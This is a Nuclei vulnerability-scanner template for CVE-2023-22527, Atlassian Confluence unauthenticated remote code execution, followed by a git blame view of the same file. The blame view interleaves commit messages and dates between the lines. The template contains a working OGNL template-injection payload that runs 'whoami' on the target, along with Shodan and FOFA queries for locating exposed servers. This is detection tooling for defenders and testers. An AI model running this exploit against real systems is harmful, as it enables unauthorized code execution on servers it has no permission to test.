nuclei-templates/http/cves/2023/CVE-2023-22527.yaml

id: CVE-2023-22527

info:
  name: Atlassian Confluence - Remote Code Execution
  author: iamnooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
  reference:
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
    - https://jira.atlassian.com/browse/CONFSERVER-93833
    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
    - http://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html
    - https://github.com/ramirezs4/Tips-and-tools-forensics---RS4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-22527
    cwe-id: CWE-74
    epss-score: 0.97459
    epss-percentile: 0.99955
    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: confluence_data_center
    shodan-query:
      - http.component:"Atlassian Confluence"
      - http.component:"atlassian confluence"
    fofa-query: app="atlassian-confluence"
  tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian

http:
  - raw:
      - |+
        POST /template/aui/text-inline.vm HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded

        label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))

    matchers:
      - type: dsl
        dsl:
          - x_vuln_check != "" # check for custom header key exists
          - contains(to_lower(body), 'empty{name=')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - x_vuln_check # prints the output of whoami
# digest: 4a0a0047304502201fa6c35d659a974b6867c95930ac86f66793ea4d356020f683caf9a3d230b537022100e3945d678c3fd19fc638795f92994422bb73daa19901590a03760bf937f7b73e:922c64590222798bb761d5b6d8e72950
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
+								id: CVE-2023-22527
 								info:
 								  name: Atlassian Confluence - Remote Code Execution
 								  author: iamnooob,rootxharsh,pdresearch
 								  severity: critical
 								  description: |
 								    A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.
 								    Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
 								  reference:
 								    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615
 								    - https://jira.atlassian.com/browse/CONFSERVER-93833
 								    - https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
-												TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:

											
										
										
											2024-03-23 09:28:19 +00:00
+								    - http://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html
 								    - https://github.com/ramirezs4/Tips-and-tools-forensics---RS4
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
+								  classification:
-												TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:

											
										
										
											2024-03-23 09:28:19 +00:00
+								    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 								    cvss-score: 9.8
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
+								    cve-id: CVE-2023-22527
-												TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:

											
										
										
											2024-03-23 09:28:19 +00:00
+								    cwe-id: CWE-74
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								    epss-score: 0.97459
 								    epss-percentile: 0.99955
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
+								    cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
 								  metadata:
 								    max-request: 1
 								    vendor: atlassian
 								    product: confluence_data_center
-												TemplateMan Update [Fri Jun  7 10:04:28 UTC 2024] :robot:

											
										
										
											2024-06-07 10:04:29 +00:00
+								    shodan-query:
 								      - http.component:"Atlassian Confluence"
 								      - http.component:"atlassian confluence"
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								    fofa-query: app="atlassian-confluence"
-												TemplateMan Update [Fri Jun  7 10:04:28 UTC 2024] :robot:

											
										
										
											2024-06-07 10:04:29 +00:00
+								  tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
 								http:
 								  - raw:
 								      - |+
 								        POST /template/aui/text-inline.vm HTTP/1.1
 								        Host: {{Hostname}}
 								        Accept-Encoding: gzip, deflate, br
 								        Content-Type: application/x-www-form-urlencoded
-												Updated payload to execute whoami and print the output

											
										
										
											2024-01-23 20:28:11 +00:00
+								        label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
 								    matchers:
-												Updated payload to execute whoami and print the output

											
										
										
											2024-01-23 20:28:11 +00:00
+								      - type: dsl
 								        dsl:
 								          - x_vuln_check != "" # check for custom header key exists
 								          - contains(to_lower(body), 'empty{name=')
 								        condition: and
-												Added template for CVE-2023-22527

Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
Co-Authored-By: Rahul Maini <31939327+iamnoooob@users.noreply.github.com>

											
										
										
											2024-01-22 08:43:25 +00:00
-												Updated payload to execute whoami and print the output

											
										
										
											2024-01-23 20:28:11 +00:00
+								    extractors:
 								      - type: dsl
 								        dsl:
-												Auto Template Signing [Wed Jan 24 04:01:02 UTC 2024] :robot:

											
										
										
											2024-01-24 04:01:02 +00:00
+								          - x_vuln_check # prints the output of whoami
-												Auto Template Signing [Sat Jun  8 16:02:16 UTC 2024] :robot:

											
										
										
											2024-06-08 16:02:17 +00:00
+								# digest: 4a0a0047304502201fa6c35d659a974b6867c95930ac86f66793ea4d356020f683caf9a3d230b537022100e3945d678c3fd19fc638795f92994422bb73daa19901590a03760bf937f7b73e:922c64590222798bb761d5b6d8e72950